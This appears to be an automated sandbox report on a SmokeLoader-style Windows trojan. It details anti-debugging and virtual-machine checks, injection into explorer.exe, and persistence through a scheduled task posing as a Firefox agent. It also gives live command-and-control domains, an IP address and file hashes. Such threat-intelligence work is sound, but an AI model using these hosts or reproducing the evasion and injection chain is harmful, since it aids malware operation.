              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 850Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
              Source: C:\Users\user\Desktop\01885599.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,0_2_00403870
              Source: C:\Users\user\Desktop\01885599.exeSystem information queried: ModuleInformationJump to behavior
              Source: explorer.exe, 00000003.00000000.551747489.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000003.00000000.551747489.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
              Source: explorer.exe, 00000003.00000000.547717895.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
              Source: explorer.exe, 00000003.00000000.541592445.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000003.00000000.551747489.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000003.00000000.554336000.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
              Source: explorer.exe, 00000003.00000000.551747489.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\01885599.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040533B
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040D6B0
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F0042 push dword ptr fs:[00000030h]0_2_007F0042
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 5_2_00820042 push dword ptr fs:[00000030h]5_2_00820042
              Source: C:\Users\user\Desktop\01885599.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_004084CF SetUnhandledExceptionFilter,0_2_004084CF
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040D9F8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_0040D9F8
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040533B
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_004063C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004063C4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: vbjjhwi.3.drJump to dropped file
              Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
              Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
              Source: C:\Windows\explorer.exeNetwork Connect: 194.50.153.68 80Jump to behavior
              Source: C:\Users\user\Desktop\01885599.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeMemory written: C:\Users\user\Desktop\01885599.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiMemory written: C:\Users\user\AppData\Roaming\vbjjhwi base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_007F0110
              Source: C:\Users\user\Desktop\01885599.exeThread created: C:\Windows\explorer.exe EIP: 4C01930Jump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiThread created: unknown EIP: 4B01930Jump to behavior
              Source: C:\Users\user\Desktop\01885599.exeProcess created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiProcess created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwiJump to behavior
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.551747489.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.548723968.0000000005C70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000003.00000000.541592445.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\01885599.exeCode function: GetLocaleInfoA,0_2_00410F37
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040963C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040963C
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,0_2_00403870

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              512
              Process Injection
              11
              Masquerading
              1
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Virtualization/Sandbox Evasion
              LSASS Memory421
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth2
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)512
              Process Injection
              Security Account Manager12
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
              Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Deobfuscate/Decode Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common3
              Obfuscated Files or Information
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem14
              System Information Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              File Deletion
              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 876999 Sample: 01885599.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Found malware configuration 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 6 other signatures 2->36 7 01885599.exe 2->7         started        10 vbjjhwi 2->10         started        process3 signatures4 46 Detected unpacking (changes PE section rights) 7->46 48 Contains functionality to inject code into remote processes 7->48 50 Injects a PE file into a foreign processes 7->50 12 01885599.exe 7->12         started        52 Multi AV Scanner detection for dropped file 10->52 54 Machine Learning detection for dropped file 10->54 15 vbjjhwi 10->15         started        process5 signatures6 56 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Checks if the current machine is a virtual machine (disk enumeration) 12->60 17 explorer.exe 2 3 12->17 injected 62 Creates a thread in another existing process (thread injection) 15->62 process7 dnsIp8 26 host-file-host6.com 194.50.153.68, 49684, 80 GAZ-IS-ASRU United Kingdom 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\vbjjhwi, PE32 17->22 dropped 24 C:\Users\user\...\vbjjhwi:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              01885599.exe37%VirustotalBrowse
              01885599.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\vbjjhwi100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\vbjjhwi41%ReversingLabs
              C:\Users\user\AppData\Roaming\vbjjhwi37%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              host-file-host6.com22%VirustotalBrowse
              host-host-file8.com19%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
              http://host-file-host6.com/0%URL Reputationsafe
              http://host-host-file8.com/100%URL Reputationmalware
              http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              host-file-host6.com
              194.50.153.68
              truetrueunknown
              host-host-file8.com
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://host-file-host6.com/true
              • URL Reputation: safe
              unknown
              http://host-host-file8.com/true
              • URL Reputation: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmpfalse
              • URL Reputation: safe
              unknown
              http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              194.50.153.68
              host-file-host6.comUnited Kingdom
              198526GAZ-IS-ASRUtrue
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:876999
              Start date and time:2023-05-28 10:42:06 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:01885599.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/3@4/1
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 89% (good quality ratio 81.4%)
              • Quality average: 69.7%
              • Quality standard deviation: 32.3%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 21
              • Number of non-executed functions: 21
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              10:43:38API Interceptor495x Sleep call for process: explorer.exe modified
              10:43:39Task SchedulerRun new task: Firefox Default Browser Agent 584CBA64FC927E3D path: C:\Users\user\AppData\Roaming\vbjjhwi
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              194.50.153.68HRBKz0kJwh.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              QP83uZrraW.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              PachIuLXAD.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              04121999.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              09956499.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              01294199.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              04093899.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              lB5VaRZHue.exeGet hashmaliciousSmokeLoaderBrowse
              • host-file-host6.com/
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              host-file-host6.comHRBKz0kJwh.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              QP83uZrraW.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              PachIuLXAD.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              04121999.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              09956499.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              01294199.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              04093899.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              lB5VaRZHue.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              qnxkc5slHC.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              toolspub1.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              cjDX3dEa6r.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              orwpdQFD5v.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              yuegj44pTc.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              FZNvRre16c.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              wWS49l4c5n.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              http://host-file-host6.comGet hashmaliciousUnknownBrowse
              • 193.233.134.80
              RGp82p18Id.exeGet hashmaliciousSmokeLoaderBrowse
              • 193.233.134.80
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              GAZ-IS-ASRUHRBKz0kJwh.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              QP83uZrraW.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              PachIuLXAD.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              04121999.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              09956499.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              01294199.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              04093899.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              lB5VaRZHue.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.68
              http://cc1.applicationshy.co.in/34546de4235m342356Get hashmaliciousUnknownBrowse
              • 194.50.153.66
              https://61mgzw34.page.link/tobRGet hashmaliciousUnknownBrowse
              • 194.50.153.66
              qT4VNvfY3r.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
              • 194.50.153.77
              02321699.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
              • 194.50.153.77
              05500299.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
              • 194.50.153.77
              s7MlmSnxZT.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
              • 194.50.153.77
              https://1drv.ms/b/s!AkI7leCIvhOyaYVOF475u5myxPUGet hashmaliciousUnknownBrowse
              • 194.50.153.66
              https://1drv.ms/b/s!Ag-bPMQV0UTbcQo0XST3R05gyJIGet hashmaliciousUnknownBrowse
              • 194.50.153.66
              09445899.exeGet hashmaliciousSmokeLoaderBrowse
              • 194.50.153.77
              file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
              • 194.50.153.77
              file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
              • 194.50.153.77
              https://1drv.ms/b/s!As8RelC5Hm_pcw3ZOs-yIc1XOb4Get hashmaliciousUnknownBrowse
              • 194.50.153.66
              No context
              No context
              Process:C:\Windows\explorer.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):985
              Entropy (8bit):5.225141189452099
              Encrypted:false
              SSDEEP:24:YqHZ6T06MhmimH6CUXyhm/mYbNdB6hmUmYz0JahmDmYbxdB6hm1mY7KTdB6hmuXA:YqHZ6T06McLHDUXyceYbNdUcZYz0Jack
              MD5:094FB5672ED4D4990DF33BE15CE2CB40
              SHA1:2BF77D89C6637F478893D63DFC809808C835A839
              SHA-256:19FEE75854625F0D51FE350049FE33EB16CB40E728C9BAADB232CA3E449DECA3
              SHA-512:A542CF7E0BE301B8BB2E369B0750D0C93941E02D044BFA840A28FBBEDD3F3EAF2D4E0F01ED0B3F836C916D0F0B79EEDD084DBE941A6424947C4EFE87AF38B304
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3031678576,"LastSwitchedHighPart":30840569,"PrePopulated":false},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4008173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3998173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3988173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3968173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3958173792,"LastSwitchedHighPart":30747923,"PrePopulated":true}]}
              Process:C:\Windows\explorer.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):290304
              Entropy (8bit):6.587235509794249
              Encrypted:false
              SSDEEP:3072:X6JOiohJ19MbvuzdRE45nLtn5gFTti91:yOiY9T10FTti
              MD5:A29C587C678826F4A44CF6A2A78599F1
              SHA1:92EA36730FA1F19300A27EBBB4D1359E7B8A16DE
              SHA-256:B3FBCFD775B7C9BFC5B58F5DF13EB8FBEB4844D98756F8FCA41B63F060AE5132
              SHA-512:72CB4A67885C7E2167F98365F209FB0F757FB978ACBB55099D5A8B768DDE4158071DF3BD6D6CD808255A45FFE24040D86715A673EAEB386B1412918B2C65DDED
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 41%
              • Antivirus: Virustotal, Detection: 37%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L.... Ib....................."&.....YN............@...........................(.....E...........................................d.....'.......................(..... ...............................P1..@............................................text............................... ..`.data...DX$.........................@....rsrc.........'.....................@..@.reloc..83....(..4...:..............@..B........................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\explorer.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.587235509794249
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:01885599.exe
              File size:290304
              MD5:a29c587c678826f4a44cf6a2a78599f1
              SHA1:92ea36730fa1f19300a27ebbb4d1359e7b8a16de
              SHA256:b3fbcfd775b7c9bfc5b58f5df13eb8fbeb4844d98756f8fca41b63f060ae5132
